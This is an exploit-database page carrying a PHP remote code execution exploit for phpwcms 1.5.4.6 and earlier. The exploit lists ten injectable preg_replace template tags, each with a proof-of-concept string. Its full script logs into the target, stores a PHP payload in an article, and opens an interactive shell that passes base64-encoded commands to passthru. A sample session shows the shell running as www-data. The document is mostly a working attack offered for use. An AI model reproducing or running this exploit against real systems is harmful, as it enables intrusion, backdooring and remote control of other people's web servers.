0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpwcms <= v1.5.4.6 "preg_replace" Multiple Vulnerabilities
<?php /* phpwcms <= v1.5.4.6 "preg_replace" remote code execution exploit vendor: http://www.phpwcms.de/ Download: github.com/slackero/phpwcms by: aeon Well it appears there are multiple remote code execution bugs that exists in phpwcms for quite some time now. Here I will exploit one of them, but many are available to an attacker. I have only listed 10 as I got bored after that point... In order to exploit the vulnerabilities, you will need to have access to an authenticated account as either a "backend user", "admin user" or "frontend / backend user". The only account that cannot exploit these vulnerabilities is the "frontend user". Other vulnerabilities most probably exist in this application but I don't bother auditing for xss/csrf/click jacking etc. I only care about true remotely exploitable bugs 8-) Examples: 1. Lines 699-700 of ./include/inc_front/content.func.inc.php: ------------------------------------------------------------- // list based navigation starting at given level $replace = 'nav_list_struct($content["struct"],$content["cat_id"],"$1", "$2");'; $content["all"] = preg_replace('/\{NAV_LIST:(\d+):{0,1}(.*){0,1}\}/e', $replace, $content["all"]); PoC: {NAV_LIST:1:{${phpinfo()}}} 2. Line 704 of ,.include/inc_front/content.func.inc.php: -------------------------------------------------------- $content["all"] = preg_replace('/\{NAV_LIST_TOP:(.*?):(.*?)\}/e', 'css_level_list($content["struct"], $content["cat_path"], 0, "$1", 1, "$2")', $content["all"]); PoC: {NAV_LIST_TOP:{${phpinfo}}:1} 3. line 708 of ./include/inc_front/content.func.inc.php: -------------------------------------------------------- $content["all"] = preg_replace('/\{NAV_LIST_CURRENT:(\d+):(.*?):(.*?)\}/e', 'css_level_list($content["struct"],$content["cat_path"],$content["cat_id"],"$2","$1","$3")', $content["all"]); PoC: {NAV_LIST_CURRENT:1:{${phpinfo()}}:1} 4. Line 792 of ./include/inc_front/content.func.inc.php: -------------------------------------------------------- $content["all"] = preg_replace('/\{BROWSE:NEXT:(.*?):(0|1)\}/e','get_index_link_next("$1",$2);',$content["all"]); PoC: {BROWSE:NEXT:{${phpinfo()}}:1} 5. Line 793 of ./include/inc_front/content.func.inc.php: -------------------------------------------------------- $content["all"] = preg_replace('/\{BROWSE:PREV:(.*?):(0|1)\}/e','get_index_link_prev("$1",$2);',$content["all"]); PoC: {BROWSE:PREV:{${phpinfo()}}:1} 6. Line 2661 of ./include/inc_front/front.func.inc.php: ------------------------------------------------------- $text = preg_replace('/\{LIVEDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$livedate.'")', $text); PoC: {LIVEDATE:{${phpinfo()}} lang=ru} 7. Line 2658 of ./include/inc_front/front.func.inc.php: ------------------------------------------------------- $text = preg_replace('/\{DATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text); PoC: {DATE:{${phpinfo()}} lang=ru} 8. Line 2665 of ./include/inc_front/front.func.inc.php: ------------------------------------------------------- $text = preg_replace('/\{KILLDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$killdate.'")', $text); PoC: {KILLDATE:{${phpinfo()}} lang=ru} 9. Line 2668 of ./include/inc_front/front.func.inc.php: ------------------------------------------------------- return preg_replace('/\{NOW:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.now().'")', $text); PoC: {NOW:{${phpinfo()}} lang=ru} 10. Line 2674 of ./include/inc_front/front.func.inc.php: -------------------------------------------------------- $text = preg_replace('/\{'.$rt.':(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text); PoC: {DATE:{${phpinfo()}} lang=ru} ################################################################################################ [aeon@brainbox 0day]$ php ./phpwcmsrce.php 192.168.1.120 /phpwcms-1.5.4.6/ jack password +-----------------------------------------------------------+ | phpwcms <= v1.5.4.6 Remote Code Execution Exploit by aeon | +-----------------------------------------------------------+ (+) initiating target interaction (+) grabbed a valid session (+) logged into the target application (+) exploit working! dropping to shell.. phpwcms-shell> id uid=33(www-data) gid=33(www-data) groups=33(www-data) phpwcms-shell> uname -a Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux ################################################################################################ */ error_reporting(0); set_time_limit(0); ini_set('default_socket_timeout', 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n(-) No response from {$host}:80\r\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------------------------------+"; print "\n| phpwcms <= v1.5.4.6 Remote Code Execution Exploit by aeon |"; print "\n+-----------------------------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php $argv[0] <host> <path> <user> <pass>\n"; print "\nExample....: php $argv[0] localhost / admin pass"; print "\nExample....: php $argv[0] localhost /phpwcms-1.5.4.6/ jack black\n"; die(); } list($host, $path, $user, $pass) = array($argv[1], $argv[2], $argv[3], $argv[4]); // init session print "(+) initiating target interaction\r\n"; $packet = "GET {$path}login.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Set-Cookie: (.+); path=/', http_send($host, $packet), $m) ? $m[1] : ''; print ($_prefix ? "(+) grabbed a valid session" : "(-) exploit failed! couldnt obtain a session")."\r\n"; $pass = md5($pass); $postcreds = "json=1&md5pass={$pass}&form_aktion=login&form_loginname={$user}&form_lang=ru&submit_form=Login"; // login $packet = "POST {$path}login.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($postcreds)."\r\n"; $packet .= "Connection: close\r\n\r\n{$postcreds}"; if (!preg_match('/HTTP\/1.[01] 302 Found/', http_send($host, $packet))) die("\n(-) login failed!\n"); print "(+) logged into the target application\r\n"; $phpkode = '{${error_reporting(0)}}{${print(aeon)}}{${passthru(base64_decode($_SERVER[HTTP_PHPWCMS]))}}{${die}}'; $pat = "{DATE:{$phpkode} lang=en}"; $payload = "article_cid=0&article_title=wtf&set_begin=1&article_begin=2012-12-16+00%3A00%3A00&article_summary="; $payload .= urlencode($pat)."&article_username=jack&article_aktiv=1&article_public=1&article_update=1&updatesubmit=Create"; // backdooring db content $packet = "POST {$path}phpwcms.php?do=articles&p=2&s=1&aktion=1&id=0 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Cookie: {$_prefix}\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; $_aid = preg_match('/&id=([0-9]{0,30})/', http_send($host, $packet), $m) ? $m[1] : ''; print ($_aid ? "(+) exploit working! dropping to shell.." : "(-) exploit failed! couldnt find article id")."\r\n"; // triggering preg_replace code evaluation $packet = "GET {$path}index.php?aid={$_aid} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Phpwcms: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/aeon', http_send($host, $packet))) die("\n(-) opps! hmm, backdoor didnt quite work..\r\n"); while(1) { print "\nphpwcms-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/aeon(.*)/s', $response, $m) ? print $m[1] : die("\n(-) exploit failed!\n"); } // @aeon_flux_ | aeon.s.flux(at)gmail(.)com | https://infosecabsurdity.wordpress.com/ ?> # 0day.today [2024-12-25] #